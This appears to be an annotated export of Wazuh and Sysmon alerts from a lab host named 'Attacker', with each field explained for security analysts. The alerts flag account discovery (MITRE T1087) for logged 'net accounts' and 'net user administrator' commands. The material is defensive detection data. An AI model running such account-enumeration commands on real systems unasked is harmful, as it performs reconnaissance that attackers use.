data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.074 ProcessGuid: {94294ddc-be63-680a-220c-000000000e00} ProcessId: 8356 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be62-680a-200c-000000000e00} ParentProcessId: 8592 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.074
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-220c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be62-680a-200c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.821+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.821+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2270752
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.1334158Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291050
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.130 ProcessGuid: {94294ddc-be63-680a-230c-000000000e00} ProcessId: 10588 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.130
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-230c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10588
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.869+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.869+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2275989
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.2449488Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291053
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.238 ProcessGuid: {94294ddc-be63-680a-250c-000000000e00} ProcessId: 12592 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-230c-000000000e00} ParentProcessId: 10588 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.238
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-250c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12592
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net1.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\net1 accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-230c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10588
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.934+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.934+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2281048
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.2961799Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291056
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.290 ProcessGuid: {94294ddc-be63-680a-260c-000000000e00} ProcessId: 16356 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.290
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-260c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net user administrator
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.966+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.966+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2286331
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.3953532Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291059
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

